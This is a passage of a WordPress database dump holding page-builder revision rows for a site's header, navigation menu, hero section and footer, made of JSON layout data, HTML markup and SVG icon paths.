0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2024-11-07 12:31:50','2024-11-07 17:31:50','',182,'https://gsudice.dataconn.net/?p=1853',0,'revision','',0),(1854,1,'2024-11-07 12:31:50','2024-11-07 17:31:50','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2024-11-07 12:31:50','2024-11-07 17:31:50','',26,'https://gsudice.dataconn.net/?p=1854',0,'revision','',0),(1855,1,'2024-11-07 12:31:50','2024-11-07 17:31:50','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2024-11-07 12:31:50','2024-11-07 17:31:50','',25,'https://gsudice.dataconn.net/?p=1855',0,'revision','',0),(1856,1,'2024-11-07 12:31:50','2024-11-07 17:31:50','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2024-11-07 12:31:50','2024-11-07 17:31:50','',29,'https://gsudice.dataconn.net/?p=1856',0,'revision','',0),(1857,1,'2024-11-07 12:31:50','2024-11-07 17:31:50','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" 